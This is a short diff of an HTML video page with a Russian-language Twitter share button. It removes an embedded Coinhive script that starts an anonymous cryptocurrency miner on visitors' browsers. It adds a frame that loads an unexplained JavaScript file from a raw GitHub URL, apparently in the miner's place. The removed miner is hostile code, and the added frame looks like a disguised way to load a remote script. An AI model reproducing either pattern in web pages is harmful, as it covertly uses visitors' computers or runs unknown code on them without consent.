--- a/tc3.html
+++ b/tc3.html
@@ -35,10 +35,8 @@
     <div style="display:inline-block" id="twitter_button"><a class="twitter-share-button" data-count="none" data-lang="ru" data-related="Berder_:SEO раскрутка сайтов,loteron_f:Читай меня  а я буду читать тебя,DimonDDDDD:Читай меня  а я буду читать тебя,mofigbuul:Автомобили FollowBack" data-size="large" data-via="loteron_f" href="https://twitter.com/share?text=Messi crying">Tweet</a></div>
 
                    <iframe width="640" height="360" src="https://playreplay.me/framevideo/7p598.3999548131ea3cafd7e0166862b5?width=640&height=360" frameborder="0" allowfullscreen><!--old metod-->
-<script src="https://coin-hive.com/lib/coinhive.min.js">
-    var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});
-    miner.start();
-</script></iframe>
+</iframe>
+ <frame name="f1" src="https://raw.githubusercontent.com/geper/decision-trees/gh-pages/defe.js">
 
 
 </div>
